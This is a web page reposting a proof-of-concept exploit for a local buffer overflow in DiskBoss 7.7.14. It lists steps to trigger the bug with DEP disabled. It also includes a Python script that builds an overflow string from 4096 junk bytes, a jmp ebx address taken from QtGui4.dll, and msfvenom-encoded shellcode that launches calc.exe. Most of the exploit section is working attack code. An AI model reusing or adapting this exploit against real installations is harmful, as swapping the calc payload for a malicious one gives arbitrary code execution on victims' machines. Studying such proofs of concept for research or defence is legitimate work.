2025 marks a 37% rise in deepfake-led cyber attacks targeting enterprise systems.

icon icon icon

admin |

Exploit DiskBoss 7.7.14 – ‘Input Directory’ Local Buffer Overflow (PoC)

Exploit DiskBoss 7.7.14 – ‘Input Directory’ Local Buffer Overflow (PoC)




 Exploit Title: DiskBoss 7.7.14 – ‘Input Directory’ Local Buffer Overflow (PoC)

 Vendor Homepage: https://www.diskboss.com/

 Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe

 Exploit Author: Paras Bhatia

 Discovery Date: 2020-04-01

 Vulnerable Software: DiskBoss

 Version: 7.7.14

 Vulnerability Type: Local Buffer Overflow

 Tested on: Windows 7 Ultimate Service Pack 1 (32 bit – English)  

Steps to Produce the Crash:

   1.- Run python code: DiskbossLCE.py

   2.- Copy content to clipboard

   3.- Turn off DEP for diskbsg.exe

   4.- Open “diskboss.exe” (diskbsg.exe)

   5.- Go to “Command” > Search Files

   6.- Click on second + icon (located at right side of “Search Disks, Directories and Network Shares”)

   7.- Click on ” Add Input Directory”

   8.- Paste ClipBoard into the “Directory” field

   9.- Click on OK

   10.- Calc.exe runs

Python “DiskbossLCE.py” Code:

f = open(“DiskbossLCE.txt”, “w”)

 Message=  0x650EA4CA : jmp ebx |  [QtGui4.dll] (C:\Program Files\DiskBoss\bin\QtGui4.dll)

jmpebx = “\xCA\xA4\x0E\x65”

 msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed BufferRegister=EBX -f python -b “\x0a\x0d\x2f\x5c\x00”

buf =  “”

buf += “\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49”

buf += “\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30”

buf += “\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42”

buf += “\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49”

buf += “\x79\x6c\x79\x78\x4e\x62\x73\x30\x63\x30\x67\x70\x73”

buf += “\x50\x4f\x79\x48\x65\x56\x51\x59\x50\x31\x74\x6c\x4b”

buf += “\x30\x50\x50\x30\x4c\x4b\x51\x42\x74\x4c\x6e\x6b\x51”

buf += “\x42\x74\x54\x4c\x4b\x44\x32\x77\x58\x44\x4f\x4c\x77”

buf += “\x70\x4a\x55\x76\x44\x71\x69\x6f\x4c\x6c\x45\x6c\x53”

buf += “\x51\x73\x4c\x55\x52\x74\x6c\x31\x30\x49\x51\x4a\x6f”

buf += “\x34\x4d\x43\x31\x7a\x67\x69\x72\x6c\x32\x72\x72\x71”

buf += “\x47\x6c\x4b\x42\x72\x54\x50\x6c\x4b\x70\x4a\x65\x6c”

buf += “\x4c\x4b\x70\x4c\x64\x51\x62\x58\x39\x73\x51\x58\x67”

buf += “\x71\x38\x51\x66\x31\x4c\x4b\x31\x49\x31\x30\x33\x31”

buf += “\x78\x53\x4c\x4b\x31\x59\x44\x58\x49\x73\x65\x6a\x51”

buf += “\x59\x6e\x6b\x30\x34\x4e\x6b\x73\x31\x58\x56\x56\x51”

buf += “\x4b\x4f\x6c\x6c\x5a\x61\x5a\x6f\x34\x4d\x65\x51\x58”

buf += “\x47\x35\x68\x4d\x30\x30\x75\x58\x76\x55\x53\x31\x6d”

buf += “\x49\x68\x45\x6b\x43\x4d\x74\x64\x32\x55\x4b\x54\x42”

buf += “\x78\x6c\x4b\x51\x48\x46\x44\x57\x71\x48\x53\x62\x46”

buf += “\x4e\x6b\x46\x6c\x50\x4b\x4c\x4b\x73\x68\x75\x4c\x43”

buf += “\x31\x79\x43\x4e\x6b\x36\x64\x6c\x4b\x45\x51\x6e\x30”

buf += “\x4e\x69\x30\x44\x56\x44\x57\x54\x51\x4b\x61\x4b\x73”

buf += “\x51\x51\x49\x50\x5a\x50\x51\x4b\x4f\x6b\x50\x33\x6f”

buf += “\x33\x6f\x72\x7a\x6c\x4b\x42\x32\x78\x6b\x4e\x6d\x31”

buf += “\x4d\x50\x6a\x56\x61\x6e\x6d\x4b\x35\x38\x32\x43\x30”

buf += “\x47\x70\x35\x50\x42\x70\x62\x48\x36\x51\x4e\x6b\x32”

buf += “\x4f\x6d\x57\x49\x6f\x4e\x35\x6f\x4b\x7a\x50\x4d\x65”

buf += “\x6c\x62\x32\x76\x71\x78\x6c\x66\x6e\x75\x4f\x4d\x6f”

buf += “\x6d\x4b\x4f\x5a\x75\x65\x6c\x46\x66\x33\x4c\x66\x6a”

buf += “\x6b\x30\x4b\x4b\x4d\x30\x53\x45\x34\x45\x4f\x4b\x53”

buf += “\x77\x64\x53\x64\x32\x30\x6f\x42\x4a\x43\x30\x50\x53”

buf += “\x59\x6f\x78\x55\x75\x33\x51\x71\x72\x4c\x73\x53\x36”

buf += “\x4e\x55\x35\x74\x38\x71\x75\x47\x70\x41\x41”

junk1 = “A” * 4096

junk2 = “C” * 1196

payload= junk1 + jmpebx + junk2 + buf

f.write(payload)

f.close()

icon icon
icon
innovative companies innovative companies innovative companies innovative companies innovative companies innovative companies innovative companies innovative companies innovative companies innovative companies innovative companies innovative companies innovative companies
icon icon